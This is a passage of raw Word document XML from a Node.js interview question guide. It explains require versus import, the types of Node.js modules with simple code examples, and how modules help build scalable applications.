    <w:p w14:paraId="21E9CF4E"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1C29B03"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1C173FE"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58BB010"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app.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AEE3904"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commonjsModule = require('./commonjs-module');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300E3B2D"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console.log(commonjsModule.greet());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D00F654" w14:textId="77777777" w:rsidR="00BF0CD5" w:rsidRPr="00DA2F32" w:rsidRDefault="00BF0CD5" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Using import:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4D61EA"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esmodule.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B232DC"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export function greet() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39560E7E"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'Hello, World!';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3576D942"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B797884"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E113AFD"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app.mjs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2610F05A"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import { greet } from './esmodule.js';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E16AA9" w14:textId="77777777" w:rsidR="00BF0CD5" w:rsidRPr="00DA2F32" w:rsidRDefault="00BF0CD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console.log(greet());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC5B78D" w14:textId="77777777" w:rsidR="00BF0CD5" w:rsidRPr="00DA2F32" w:rsidRDefault="00BF0CD5" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581F7443" w14:textId="77777777" w:rsidR="00BF0CD5" w:rsidRPr="00DA2F32" w:rsidRDefault="00BF0CD5" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="103"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>require</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> is part of the CommonJS module system and is synchronous, used widely in Node.js for its simplicity and support in all versions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49BC1897" w14:textId="77777777" w:rsidR="00BF0CD5" w:rsidRPr="00DA2F32" w:rsidRDefault="00BF0CD5" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="103"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> is part of the ECMAScript module system, supports asynchronous loading, and is the standard for modern JavaScript, including browser and Node.js environments with proper configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D28156" w14:textId="77777777" w:rsidR="00BF0CD5" w:rsidRPr="00DA2F32" w:rsidRDefault="00BF0CD5" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6532A159"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46" w:name="_Toc178383229"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Q44. How does Node.js handle asynchronous code execution, and what are the best practices for writing asynchronous code in Node.js?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="46"/>
    </w:p>
    <w:p w14:paraId="6264BEDA" w14:textId="77777777" w:rsidR="00E40D14" w:rsidRPr="00DA2F32" w:rsidRDefault="00E40D14" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="616161"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="47" w:name="_Toc178383230"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Q45. What is the role of the "module" object in Node.js, and how can it be used to create reusable code?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="47"/>
    </w:p>
    <w:p w14:paraId="4DFAA423"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48" w:name="_Toc178383231"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Q46. What are the different types of Node.js modules, and how can they be used to build scalable applications?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="48"/>
    </w:p>
    <w:p w14:paraId="7511460E" w14:textId="77777777" w:rsidR="004A12A2" w:rsidRPr="00DA2F32" w:rsidRDefault="004A12A2" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Types of Node.js Modules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B98BB6" w14:textId="77777777" w:rsidR="004A12A2" w:rsidRPr="00DA2F32" w:rsidRDefault="004A12A2" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="104"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Core Modules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13318C14"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These are built-in modules that come with Node.js. They provide essential functionality for many common tasks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED78F43"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fs (file system), http, path, os, events, stream.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9FFFCA"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7C2A9749"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08FAC774"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fs.readFile('file.txt', 'utf8', (err, data) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C27167"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1985421B"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console.log(data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2845B670"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574BC1C" w14:textId="77777777" w:rsidR="004A12A2" w:rsidRPr="00DA2F32" w:rsidRDefault="004A12A2" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="104"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Local Modules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A613458"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Modules that you create within your project. They allow you to encapsulate functionality into separate files or directories.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E21FA52"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6B05EA81"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math.js (local module)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D023C51"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add(a, b) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D0C72B"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a + b;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19758B00"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D623253"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module.exports = { add };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B318440"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5AB6CE2"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app.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7CE793"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math = require('./math');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ECCEB90"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console.log(math.add(2, 3)); // Outputs: 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5675C223" w14:textId="77777777" w:rsidR="004A12A2" w:rsidRPr="00DA2F32" w:rsidRDefault="004A12A2" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="104"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Third-Party Modules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA595D9"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Modules developed and published by the Node.js community. They are available via npm (Node Package Manager) and can be installed using npm install.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31729D92"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express (web framework), lodash (utility library), mongoose (MongoDB ORM).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1513A7B5"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56F50AC1"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11AA6DA6"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523D437C"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352BF25"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 (req, res) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687BB2C6"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res.send('Hello World!');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C8648F1"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6A93EC8"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5DA7AF6"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app.listen(3000, () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39AC1665"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console.log('Server running on port 3000');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E3F12B"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8A7B53E" w14:textId="77777777" w:rsidR="004A12A2" w:rsidRPr="00DA2F32" w:rsidRDefault="004A12A2" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="104"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ES Modules (ECMAScript Modules)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E0F553"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A modern module system introduced in ECMAScript 6 (ES6) that provides a standardized way of importing and exporting code. Supported in Node.js with .mjs file extensions or "type": "module" in package.json.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353036E9" w14:textId="77777777" w:rsidR="004A12A2" w:rsidRPr="00DA2F32" w:rsidRDefault="004A12A2" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="104"/>
        </w:num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5E2B2C38"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math.mjs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394C432D"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export function add(a, b) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB9DF3A"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a + b;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB591A8"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6A1AEDA"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73BDAC58"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app.mjs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E89B34A"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import { add } from './math.mjs';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13AFF986" w14:textId="77777777" w:rsidR="004A12A2" w:rsidRPr="00DA2F32" w:rsidRDefault="004A12A2"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console.log(add(2, 3)); // Outputs: 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="610442C6" w14:textId="77777777" w:rsidR="004A12A2" w:rsidRPr="00DA2F32" w:rsidRDefault="004A12A2" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Building Scalable Applications with Node.js Modules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B828F80" w14:textId="77777777" w:rsidR="004A12A2" w:rsidRPr="00DA2F32" w:rsidRDefault="004A12A2" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>To build scalable applications in Node.js, you need to leverage modules effectively to ensure your codebase is maintainable, reusable, and efficient. Here’s how different types of modules can help in building scalable applications:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC81F14" w14:textId="77777777" w:rsidR="004A12A2" w:rsidRPr="00DA2F32" w:rsidRDefault="004A12A2" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="105"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Modular Design</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5D2C97"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Encapsulation</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Break your application into smaller, manageable modules that encapsulate specific functionality. This makes it easier to manage, test, and understand the code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73846D07"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Code Reusability</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Create reusable modules for common tasks or features, reducing code duplication and improving maintainability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A578D05" w14:textId="77777777" w:rsidR="004A12A2" w:rsidRPr="00DA2F32" w:rsidRDefault="004A12A2" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="105"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Core Modules for Performance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC9CCD0"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Efficient Resource Handling</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Use core modules like http, fs, and stream for efficient handling of I/O operations, streaming data, and managing HTTP requests and responses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C312CB"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Asynchronous Programming</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Core modules support asynchronous operations, which helps in building non-blocking, high-performance applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B4B74F" w14:textId="77777777" w:rsidR="004A12A2" w:rsidRPr="00DA2F32" w:rsidRDefault="004A12A2" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="105"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Local Modules for Organizational Structure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE92910"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Separation of Concerns</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Organize your application into local modules based on functionality (e.g., routes, services, controllers). This separation of concerns improves code readability and maintainability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D94313"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Dependency Management</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Use local modules to manage internal dependencies and avoid circular dependencies by carefully structuring your modules.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04EEF7EA" w14:textId="77777777" w:rsidR="004A12A2" w:rsidRPr="00DA2F32" w:rsidRDefault="004A12A2" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="105"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Third-Party Modules for Enhanced Functionality</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA96E79"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Rapid Development</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Utilize third-party modules to quickly add functionality without reinventing the wheel. For example, use express for routing and middleware or mongoose for MongoDB integration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25000714"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Community Support</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Benefit from community contributions and updates to third-party modules, which can help you stay current with best practices and new features.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1C4C0E" w14:textId="77777777" w:rsidR="004A12A2" w:rsidRPr="00DA2F32" w:rsidRDefault="004A12A2" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="105"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ES Modules for Modern JavaScript Features</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="119E7AFF"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Standardized Syntax</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Use ES Modules to leverage modern JavaScript syntax for importing and exporting modules. This can improve code clarity and align with standard practices in modern JavaScript development.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E14E2D"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Interoperability</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: ES Modules allow for better interoperability between Node.js and front-end codebases, making it easier to share code across different parts of your application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6980B70A" w14:textId="77777777" w:rsidR="004A12A2" w:rsidRPr="00DA2F32" w:rsidRDefault="004A12A2" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="105"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Scalability Strategies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09FAD84C"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Microservices Architecture</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Use Node.js modules to build microservices that can be independently developed, deployed, and scaled. Each microservice can have its own set of modules.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77489108"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 Distribute load across multiple instances of your Node.js application using a reverse proxy or load balancer, with each instance running its own set of modules.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F0CD4D" w14:textId="77777777" w:rsidR="004A12A2" w:rsidRPr="00DA2F32" w:rsidRDefault="004A12A2" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="105"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Cluster Mode</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Utilize Node.js’s clustering capabilities to take advantage of multi-core processors, running multiple instances of your application to handle more requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5565343A" w14:textId="77777777" w:rsidR="004A12A2" w:rsidRPr="00DA2F32" w:rsidRDefault="004A12A2" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23779E9F"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49" w:name="_Toc178383232"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
